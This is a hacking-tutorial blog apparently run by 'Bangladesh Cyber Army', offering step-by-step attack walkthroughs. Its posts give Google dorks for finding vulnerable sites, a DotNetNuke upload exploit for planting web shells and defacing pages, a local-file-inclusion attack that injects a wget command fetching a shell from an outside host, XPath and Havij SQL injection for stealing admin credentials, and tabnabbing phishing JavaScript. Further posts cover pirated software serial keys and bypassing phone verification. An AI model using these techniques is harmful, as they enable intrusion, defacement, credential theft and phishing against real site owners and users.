Wellcome To Bangladesh Cyber Army

Bangladesh Cyber Army is Non-profit knowladgebase in Bangladesh. Lets We make a new world,A true World .

Security is the Big Challenge.

Security is your own Right.Everywhere Needs Security.Stay Connected With us.Get Bangladesh Cyber Army Update Tools and Keep secure your System.

Networking is Easiest way to stay connected each other.

Get our Latest Tutorial and Get more knowledge about Networking .

Get Our Unique Program.All feature is Updated.!

Get Up Hacker Every one Don't takes our Glory . We must Won The True Race.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Tuesday, June 24, 2014

How to Bypass 2 step mobile phone verification Google,Facebook,Ebay,Twitter Etc easily.

There is simple tricks for Bypass 2 step mobile phone verification Google,Facebook,Ebay,Twitter Etc
easily.
so i'll share it for enjoy.
http://receive-sms-online.com/
http://pinger.com
http://lleida.net/uk/
http://www.k7.net/
http://www.receivesmsonline.net/
http://sms.itz.hu/
http://slidesms.net/receive.php

Tuesday, March 12, 2013

Backtrack Setup Manually For Hacking !


The Linux (Backtrack) of all the problems that will be tried.If you do not yet have just added Join us.So go ahead and download it backtrack part by part. (Brand new, please do not disturb)
However, more One
What is Backtrack?
=> Backtrack a Linux-based operating system.
Why backtrack?
=> We mainly use Linux for hacking. And backtrack the hacking tools available to all. So we have to choose Backtrack action.
How do I set up backtrack / no harm will PC 's / ......?
=> No. We Done setup that is fully secure and that any problem that you are.
I do not say we'll use Backtrack for hacking Windows, so we'll keep this as our main pichira with the moves to create a PC Backtrack install it.
Therefore, we use the Backtrack VirtualBox installed so that we do the same with Windows and Backtrack use.
I hope you understand.
• Go to the first page to Download the Backtrack. Here
• The download on the right side of the press.

1.Release Backtrack   :  Backtrack 5 R3

    2.Window Manager:  :    Gnome....

    3.Architecture             :    32..........

    4.Image Type:             :   ISO      

    5.Download Type       :   Direct or torrent

    6.We'll Direct Download then click No Thanks            

  Please wait for download to finish it up.

• we installed virtualbox can be installed, but it is much more System hacking is no longer good for
• virtualbox's website and go to the bottom download

No More Today This file are too large


Wednesday, January 2, 2013

Free Internet Browsing and Download 100% By IDM !

Free Internet Browsing and Download 100% By IDM !
Hello visitor,
Today i'll tel how to use free internet with IDM(Internet Download manager). Actually it is old method but 100% good Working.
Step 1:Download the Software
Step 2:Register your Software by using our serial
Step 3:Disconnect The Dial up Modem
Step 4:Start a Download link.Then Put username & passward is Waps press ok.


Use our Serial Key

D60G8-Y85O8-B5YZV-U0PB3
AT6H7-TDK7X-YMB5W-QA809
DUJ7M-BBNR6-CML6I-9HVEY
U6JY7-O1C4Z-OPPJR-0JXHH
9QZWY-4AFHB-IPJ4T-RBJSE
D87W5-CKD63-RGUNI-X68EG 

Saturday, December 15, 2012

Hack your Friend's Facebook Chat History !

Today I'll explain how to hack your friend's Facebook chat history easily by a simple trick.
There is a simple easy Trick to Hack Facebook Chat History. We can Hack Chat History even if our Friends are Offline. To use this Trick follow the simple steps given below :
1) Open Friends profile.

2) Right Click on the Poke and Select Copy Link Location. Now we have the ID in our Clipboard.
3) This will exactly look like :
 http://www.facebook.com/profile.php?id=XYZ
( where XYX can be any numbers and this XYZ is nothing but the ID ).
4) Now in the Address Bar type "javascript:Chat.openTab(XYZ)" (without qoutes) and press Enter.
5) Now it is done.
6) You can see full Chat History now.
So this is a simple Trick to Hack Facebook Chat History.

                                                                                              Thank's for visiting !

Friday, October 19, 2012

Web site Hacking Dot Net Nuke (DNN)

Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij SQL Injection". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. By using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.
What is DNN (Dot Net Nuke) ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Step 1: First go to google.com search page and use this following dork to find vulnerable site.

    inurl:home/tabid/36/language/en-US/Default.aspx 

Another dorks you can use

    inurl:fcklinkgallery.aspx
    inurl:/portals/0 

Step 2: Now open any site from the search list like

    http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx 


Now replace "home/tabid/36/language/en-US/Default.aspx"           with                 Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

So your url will become

    http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

Then hit enter

Step 3: Now there are 2 possibilities

If u get Link Gallery url select then site is not vulnerable , see the image below

And If you get Like shown in below image then target is vulnerable 

ok now if you find a vulnerable site move to next step

Step 4: Now you can see 3 options there and we neeed to select “File in your site”.

Step 5: Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .

Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.

    javascript:__doPostBack('ctlURL$cmdUpload','') 

Step 6: After inject the above javascript code in browser address bar, you will get upload option instead of selection option.

Step 7: Now you have to upload your shell.

Note : But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg

So for this purpose first we need to upload a special type of shell which is specially coded in asp.

Download the shell :- For more ASP shell goto www.sh3ll.org .

Now rename your asp shell to

    yourshell.asp;.jpg

And upload it.

After uploading you can access your ASP shell by going to this address,

    http://www.vulsite.com/portals/0/yourshell.asp;.jpg

Step 8: Now upload your php shell using upload file option marked in above image.

After uploading php shell you can access it by going to this address,

    http://www.vulsite.com/portals/0/yourphpshell.php


Step 9: Now replace your index.html with original index.html. Thats it.

Well you can also hack all sites which are hosted on same server.

For that follow the bellow image and click on Drives you will find all sites hosted on same server.

Click on any one site and follow the above process to upload you shell.


Basic Ethical Hacking part 1

 Hack Website : Basic Information About Website Hacking Part 1
Well I have posted lots of articles on Email Hacking which includes Phishing and keylogging etc, but today I would like to throw some light on new topic which is "Website Hacking". Today i am first time writing article on "Website Hacking". why I am writing this article as there are lots of newbies having lots of misconceptions related hacking website, So I hope this tutorial cover all those misconception and if not all most of them.

Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.

Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available such as SQL Injection through which even a newbie can find a vulnerable site and start Hacking in just few minutes.

Basic Information About Website Hacking
What is a website hack?
The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.

With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.

Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.

A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.

People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"

The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.

Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.

Who are the hackers?

Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.

Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.

Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.

And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.

Why do they do it? What do they want?

What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because their methods are illegal!

To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:

    Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.
Theft methods:
        They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
They copy your customer database.
        They install spyware or phishing pages in your site, to grab data as your customers log in. Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
Your mail server, for sending spam.
Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
    Free use of your server's processing power, to reprogram however they want.
    Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.
    Examples:
        Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
Illegal pornographic content.
        Use your web space to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.
    Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
    Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.
    Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
    Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

    SQL Injection
    Cross Site Scripting (XSS)
    Remote File Inclusion(RFI)
    Local File inclusion(LFI)
    Directory Traversal
    Cross-site request forgery( CSRF )
    SSI Injection
    LDAP Injection
    XPath Injection
    Denial of Service - DOS Attacks

In this article, I have just shared basic information on Hacking Website. I hope you have liked the post uptill now, I will cover the method to hack website in the next post, So stay tuned !.


Web site Hacking by Local File Inclusion (LFI)

In previous article we have discussed various website hacking tutorials like..How to find a vulnerable Website?, Basic information of website hacking, XSS Tutorial , (CSRF/XSRF) and Remote File Inclusion Tutorial.

In this tutorial I show you how to get a shell on websites using Local File Inclusion (LFI) vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial.
How To Hack Website Using Local File Inclusion(LFI)

Follow the following steps to hack website using LFI and upload shell on hacked website.
Step 1: Search For LFI vulnerable Sites?
Now we are going to find a Local File Inclusion vulnerable website using some Dorks.Search that Dorks in google, to get LFI vulnerable Sites.

    inurl:redirect.php?page=
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
    inurl:/include/new-visitor.inc.php?lvc_include_dir=
    inurl:/_functions.php?prefix=
    inurl:/cpcommerce/_functions.php?prefix=
For more Dorks Visit here
Here i am using following google dork:

    inurl:redirect.php?page=

Search that in google, and you should come up with a link like this:

    www.website.com/view.php?page=contact.php

Step 2: Test Local File Inclusion vulnerability
Now lets replace contact.php with ../ so the URL will become

    www.website.com/view.php?page=../

and we got an error

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

Big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
 www.website.com/view.php?page=../../../etc/passwd

We got error and no etc/passwd file

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

    www.website.com/view.php?page=../../../../../etc/passwd

we successfully included the etc/passwd file.

    root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
Note :well if Local File Inclusion vulnerable site url is,

    www.site.com/test.php?main=lol.php

that means,

    PHP Code:
    include $main; 

so you cant go with it with any nullbyte

    ../../etc/passwd 

and if Local File Inclusion vulnerable site url like

    www.site.com/test.php?main=lol

well that means the include has .php with it as in

    PHP Code:
    include $main.'.php';

well actually we know that mean the .php comes to the end of it so we have to use the nullbyte for this one.

    ../etc/passwd

Step 3: Checking if proc/self/environ is accessible
Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

    www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

    DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
Step 4: Injecting malicious code
Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

    www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code :

    <?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>

Then submit the request.
Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.
Step 5: Access our shell
Now lets check if our malicious code was successfully injected.Lets check if the shell is present.

    www.website.com/shell.php

Our shell is there.Injection was successfully.
So friends, I hope you will like this
Local File Inclusion Tutorial....
I have personally tested this Website Hacking Tutorial and found all are working. If you have any problem in above Website hacking Using Remote File Inclusion Tutorial, please mention it in comments section.

Thursday, October 18, 2012

Xpath Injection Website Hacking Technic !

Everyday many website gets hacked by hackers but most of the hackers are hacking those website just for popularity nothing else. Today i am writing this tutorial on XPath Injection, in which i will explain you, How Hackers Hack Website Using XPath Injection.

In a typical Web Application architecture, all data is stored on a Database server. This Database server store data in various formats like an LDAP, XML or RDBMS database. The application queries the server and accesses the information based on the user input.

Normally attackers try to extract more information than allowed by manipulating or using the query with specially crafted inputs.Here, in this tutorial we’ll be discussing XPATH Injection techniques to extract data from XML databases.
Don’t forget to Subscribe to our RSS feed

XPath Injection Tutorial To Hack Websites Database

Before we go deeper into XPATH injection lets take a brief look at what XML and XPath.
What is XML?
XML stands for Extensible Markup Language and was designed or used to describe data. It provide platform for programmers to create their own customized tags to store data on database server. An XML document is mostly similar to an RDBMS Database except for the way data is stored in them. In case of a normal database, data is stored in a table rows and columns and in XML the data is stored in nodes in a tree form.
What is XPath?
XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database.
XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source.

Lets learn with the help of examples that will show how XPath works, Let's assume that our database is represented by the following XML file:

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
    <user>
    <username>wildhacker</username>
    <password>123</password>
    <account>admin</account>
    </user>
    <user>
    <username>cutler</username>
    <password>jay</password>
    <account>guest</account>
    </user>
    <user>
    <username>ronie</username>
    <password>coleman</password>
    <account>guest</account>
    </user>
    </users>


The above code show how username,password and user account details stored in XML file.

Following XPath query is used to returns the account whose username is "wildhacker" and the password is "123" : ,

    string(//user[username/text()='gandalf' and password/text()='!c3']/account/text())


If the application developer does not properly filter user input, the tester or hacker will be easily able to inject XPath code and interfere with the query result. For instance, the hacker or tester could input the following values:

    Username: ' or '1' = '1
    Password: ' or '1' = '1


Using these above parameters, the query becomes:

    string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())


As in most of the common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided.

And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.

If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack(i will explain that in next tutorials), whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.

That’s it.

So friends, I hope you will like this

Web Site Hacking Using Havij SQL Injction Manual !

Hello Visitor ,
Today I'll Explain How to hack website using Havij SQL Injection.Already I have written so many articles on website hacking in that i have explained how to find sql vulnerable website and how to hack that website database etc, today in this article I am going to write on more website hacking tutorial using Havij SQL Injection. Using Havij SQL Injection, you can easily hack website username and password.

Havji is a SQL injection tool. But is has more great skills like finding Admin panel, cracking hash. You can use it instead of the ordinary way of SQL injection. Its especially for beginners a uselful program.

By using Havij SQL Injection tool you will get bellow information of website,

    Database Name
    Decrypt MD5 Code
    Table Name
    Columns Name
    Columns Data
Steps To Hack Website Using Havij SQL Injection

Step 1: First download Havij SQL Injection Version 1.15 , Version 1.14 , Version 1.13 ,Version 1.12 

Step 2: Run Havij SQL Injection software and copy and paste vulnerable website link as shown in figure,Refer previous article of website hacking to find vulnerable website By Google Dork.
                     
Step 3: Now click in the "Analyze" Button,See Image Below.
                                                               
Step 4: Then It shows some messages there. Be alert on it and be show patience for sometime to find it's vulnerable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx
                         
Step 5: Then Move to another operation to find tables by clicking "tables" as figure shown. Now click "Get tables" Then wait some time if needed
                       
Step 6: After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure
                     
Step 7: In that Just put mark username and password and click "Get data"
                     
Finally you got now username and password of the admin...

The pass will get as md5 you can crack it also using this tool as shown in figure..
 

Monday, October 15, 2012

Hack Website : Basic Information About Website Hacking Part 1

 Hack Website : Basic Information About Website Hacking Part 1
 
Well I have posted lots of articles on Email Hacking which includes Phishing and keylogging etc, but today I would like to throw some light on new topic which is "Website Hacking". Today i am first time writing article on "Website Hacking". why I am writing this article as there are lots of newbies having lots of misconceptions related hacking website, So I hope this tutorial cover all those misconception and if not all most of them.

Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.
Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available such as SQL Injection through which even a newbie can find a vulnerable site and start Hacking in just few minutes. 
Basic Information About Website Hacking
What is a website hack?


The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.

With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.

Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.


A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.

People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"

The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.

Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.


Who are the hackers?
Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.

Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.

Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.

And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.


Why do they do it? What do they want?

What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because their methods are illegal!

To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:

    Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.

Theft methods:
        They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
        They copy your customer database.
        They install spyware or phishing pages in your site, to grab data as your customers log in.
    Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
    Your mail server, for sending spam.
    Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
    Free use of your server's processing power, to reprogram however they want.
    Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.

Examples:
        Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
Illegal pornographic content.
        Use your webspace to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.
    Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
    Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.
    Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
    Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.

Common Methods used for Website HackingThere are lots of methods that can be used to hack a website but most common ones are as follows:

    SQL Injection
    Cross Site Scripting (XSS)
    Remote File Inclusion(RFI)
    Local File inclusion(LFI)
    Directory Traversal
    Cross-site request forgery( CSRF )
    SSI Injection
    LDAP Injection
    XPath Injection
    Denial of Service - DOS Attacks

In this article, I have just shared basic information on Hacking Website. I hope you have liked the post uptill now, I will cover the method to hack website in the next post, So stay tuned !.

Sunday, October 14, 2012

The Advance Hacking TabNabbing !

Hello Visitor,

                     Today I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
Let consider a attack scenario:
1. A hacker say(me Sajal) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I (Sajal) sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.


Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:


<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (passward@2daymail.co.cc)
Website: http://www.bdcyberarmy.tk
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

